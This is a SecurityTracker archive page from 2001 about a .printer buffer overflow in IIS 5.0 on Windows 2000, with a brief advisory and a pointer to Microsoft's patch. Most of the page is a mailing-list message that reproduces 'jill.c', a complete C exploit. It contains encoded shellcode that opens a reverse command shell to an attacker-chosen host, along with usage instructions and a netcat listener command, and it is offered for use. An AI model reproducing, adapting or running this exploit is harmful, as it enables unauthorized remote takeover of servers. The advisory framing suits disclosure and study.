SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
(Another Exploit Released) Re: Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server
SecurityTracker Alert ID:  1001470
SecurityTracker URL:  http://securitytracker.com/id/1001470
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 3 2001
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): Microsoft Windows 2000 Internet Information Services 5.0, Microsoft Windows 2000 Internet Information Services 5.0 + Service Pack 1
Description:   eEye Digital Security reported a vulnerability in the Windows 2000 version of Internet Information Server 5.0. The security hole lets remote users execute arbitrary code on the server in the "system" context, which could allow the remote user to obtain system level access on the server.

Another exploit has been released. See the Source Message for the source code.

Impact:   A remote user could cause the IIS web server to execute arbitrary code in the "system" context, which could allow the remote user to obtain system level access on the server (i.e., take complete control of the server).
Solution:   The vendor has released a fix and strongly recommends that all customers with affected servers apply the patch. See the Vendor URL for patch information.
Vendor URL:  www.microsoft.com/technet/security/bulletin/ms01-023.asp (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
May 1 2001 Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server



 Source Message Contents

Subject:  IIS 5 remote exploit.


This is a multi-part message in MIME format.

------=_NextPart_000_004D_01C0D3B5.8D53BAF0
Content-Type: text/plain;
        charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Here's an exploit for the IIS 5 hole.. will give you a remote command shell,
reverse telnet style.

We've only had a chance to test this on a couple of hosts, it should work
fine - if not, drop me a mail and I'll see what I can do to remedy the
situation.

Read the comments for more info.

dark spyrit/beavuh.

------=_NextPart_000_004D_01C0D3B5.8D53BAF0
Content-Type: application/octet-stream;
        name="jill.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
        filename="jill.c"

/* IIS 5 remote .printer overflow. "jill.c" (don't ask).=0A=
*=0A=
*  by: dark spyrit <dspyrit@beavuh.org>=0A=
*=0A=
*  respect to eeye for finding this one - nice work.=0A=
*  shouts to halvar, neofight and the beavuh bitchez.=0A=
*=0A=
*  this exploit overwrites an exception frame to control eip and get to=0A=
*  our code.. the code then locates the pointer to our larger buffer and=0A=
*  execs.=0A=
*=0A=
*  usage: jill <victim host> <victim port> <attacker host> <attacker =
port>=0A=
*=0A=
*  the shellcode spawns a reverse cmd shell.. so you need to set up a=0A=
*  netcat listener on the host you control.=0A=
*=0A=
*  Ex: nc -l -p <attacker port> -vv=0A=
*=0A=
*  I haven't slept in years.=0A=
*/=0A=
=0A=
#include <sys/types.h>=0A=
#include <sys/time.h>=0A=
#include <sys/socket.h>=0A=
#include <netinet/in.h>=0A=
#include <arpa/inet.h>=0A=
#include <unistd.h>=0A=
#include <errno.h>=0A=
#include <stdlib.h>=0A=
#include <stdio.h>=0A=
#include <string.h>=0A=
#include <fcntl.h>=0A=
#include <netdb.h>=0A=
=0A=
int main(int argc, char *argv[]){=0A=
=0A=
/* the whole request rolled into one, pretty huh? carez. */=0A=
=0A=
unsigned char sploit[]=3D=0A=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20=
"=0A=
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90=
"=0A=
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95=
"=0A=
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95=
"=0A=
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3=
"=0A=
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa=
"=0A=
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91=
"=0A=
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6=
"=0A=
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56=
"=0A=
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55=
"=0A=
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95=
"=0A=
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95=
"=0A=
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5=
"=0A=
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18=
"=0A=
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a=
"=0A=
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14=
"=0A=
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2=
"=0A=
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14=
"=0A=
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2=
"=0A=
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd=
"=0A=
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5=
"=0A=
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d=
"=0A=
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3=
"=0A=
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3=
"=0A=
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15=
"=0A=
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a=
"=0A=
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0=
"=0A=
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd=
"=0A=
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1=
"=0A=
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e=
"=0A=
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4=
"=0A=
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6=
"=0A=
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7=
"=0A=
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6=
"=0A=
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0=
"=0A=
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1=
"=0A=
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2=
"=0A=
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95=
"=0A=
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95=
"=0A=
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6=
"=0A=
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0=
"=0A=
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb=
"=0A=
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb=
"=0A=
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
"=0A=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33=
"=0A=
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0=
"=0A=
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";=0A=
=0A=
        int                     s;=0A=
        unsigned short int      a_port;=0A=
        unsigned long           a_host;=0A=
        struct hostent          *ht;=0A=
        struct sockaddr_in      sin;=0A=
=0A=
        printf("iis5 remote .printer overflow.\n"=0A=
                "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");=0A=
=0A=
if (argc !=3D 5){=0A=
        printf("usage: %s <victimHost> <victimPort> <attackerHost> =
<attackerPort>\n",argv[0]);=0A=
        exit(1);=0A=
        }=0A=
        =0A=
        if ((ht =3D gethostbyname(argv[1])) =3D=3D 0){=0A=
                herror(argv[1]);=0A=
                exit(1);=0A=
        }=0A=
        =0A=
        sin.sin_port =3D htons(atoi(argv[2]));=0A=
        a_port =3D htons(atoi(argv[4]));=0A=
        a_port^=3D0x9595;=0A=
=0A=
        sin.sin_family =3D AF_INET;=0A=
        sin.sin_addr =3D *((struct in_addr *)ht->h_addr);=0A=
        =0A=
        if ((ht =3D gethostbyname(argv[3])) =3D=3D 0){=0A=
                herror(argv[3]);=0A=
                exit(1);=0A=
        }=0A=
        =0A=
        a_host =3D *((unsigned long *)ht->h_addr);=0A=
        a_host^=3D0x95959595;=0A=
=0A=
        sploit[441]=3D (a_port) & 0xff;=0A=
        sploit[442]=3D (a_port >> 8) & 0xff;=0A=
=0A=
        sploit[446]=3D (a_host) & 0xff;=0A=
        sploit[447]=3D (a_host >> 8) & 0xff;=0A=
        sploit[448]=3D (a_host >> 16) & 0xff;=0A=
        sploit[449]=3D (a_host >> 24) & 0xff;=0A=
=0A=
        if ((s =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1){=0A=
                perror("socket");=0A=
                exit(1);=0A=
        }=0A=
        =0A=
        printf("\nconnecting... \n");=0A=
=0A=
        if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) =3D=3D -1){=0A=
                perror("connect");=0A=
                exit(1);=0A=
        }=0A=
        =0A=
        write(s, sploit, strlen(sploit));=0A=
        sleep (1);=0A=
        close (s);=0A=
        =0A=
        printf("sent... \nyou may need to send a carriage on your listener if =
the shell doesn't appear.\nhave fun!\n");=0A=
        exit(0);=0A=
}       =0A=

------=_NextPart_000_004D_01C0D3B5.8D53BAF0--

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC